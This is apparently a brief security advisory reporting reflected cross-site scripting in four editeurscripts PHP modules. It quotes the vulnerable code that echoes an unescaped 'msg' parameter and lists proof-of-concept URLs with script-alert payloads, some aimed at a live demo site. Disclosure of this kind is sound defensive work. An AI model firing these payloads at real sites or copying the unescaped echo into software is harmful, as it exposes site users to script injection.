# # Multiple modules XSS vulnerability with the authors editeurscripts # Modules Vulnerable: # -EScontacts v1.0 # -EsBaseAdmin v2.1 # -EsPartenaires v1.0 # -EsNews v1.2 # # # Author: Jonathan Salwan # Mail : submit [AT] shell-storm.org # Web : http://www.shell-storm.org # # For the 4 modules, the codes were identical. # # # [...] # if ($_GET["msg"] != "") # { # $msg = str_replace("+"," ",$_GET["msg"]); # $msg = stripslashes($msg); # echo("<div align=\"center\" class=\"alert\">$msg</div><br />"); # } # [...] # # # Use Vulnerability: # ------------------ # # EsContacts v1.0 => http://localhost/EsContacts/login.php?msg=<script>alert('xss');</script> # # EsBaseAdmin v2.1 => http://localhost/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27a%27);%3C/script%3E # Live Demo => http://demo.editeurscripts.com/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E # # EsPartenaires v1.0 => http://localhost/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E # Live Demo => http://demo.editeurscripts.com/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E # # # EsNews v1.2 => http://localhost/EsNews/admin/news/modifier.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E # (not need to be administrator) # #